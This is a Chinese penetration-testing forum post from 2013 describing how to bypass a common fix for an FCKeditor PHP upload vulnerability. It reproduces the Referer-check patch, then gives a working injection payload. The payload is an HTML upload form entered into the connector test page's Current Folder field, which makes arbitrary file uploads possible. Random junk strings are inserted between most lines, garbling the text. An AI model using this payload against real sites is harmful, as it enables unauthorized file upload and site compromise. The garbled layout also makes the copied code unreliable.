中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
) [2 R- h! C5 Q4 s4 ^
网上给出的修复方案是
) ?& _( J* C. d; `# R2 b
修复方法,删除FCK编辑器用其他的编辑器
1 f# Z3 c& l6 K0 s. z* F, j
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
' F3 w3 e. r, C
在
5 j8 x- F$ o) i$ V2 e/ q# r
require(‘config.php’);
$ J: K: m' l! a
require(‘util.php’);
7 T a& |% ^5 \3 ^! a
的下面添加以下代码—————————–
1 m3 q. c+ F9 g( `- t
//防止外部提交
, \$ ]( x; W9 j2 m
function outsidepost()
! J5 X, m4 b, D3 O' Z% a' }& j6 E
{
" _2 N$ {6 a& H
$servername=$_SERVER['SERVER_NAME'];
; k/ x9 G* z# h, u3 l: E/ a" Q" G: K) t
$sub_from=@$_SERVER['HTTP_REFERER'];
. O! B% H, I" L
$sub_len=strlen($servername);
* t7 R T# K& K/ W9 w& V
$checkfrom=substr($sub_from,7,$sub_len);
$ d M' L" g5 k# @
if($checkfrom!=$servername){
; j- o* R! ]( k0 X# k( t; T5 j4 S' T
echo(“you don’t outsidepost!”);
$ }' ~; O& B% h' U/ }* {
exit;
! G! R8 Y; C; G4 l) x7 @
}
G$ @ _- F1 _5 k5 S( W' X( _
}
8 r! H7 t: G7 f/ Y7 d
outsidepost();
# L$ F2 c3 z2 t+ n
防止外部提交,但是没有防止内部提交,
, F. k1 I" K( [9 W8 _& h; G
利用方法:
1 v2 M! z+ t1 N* ~2 o* X; Z% ?
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
! V" n( _5 \2 B4 T
2,在Current Folder 框输入
' H1 S7 e0 U% B) H/ a6 V/ e
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
9 U2 b! a. N$ l! W
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
2 K+ p; x ]3 j6 v. ^
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2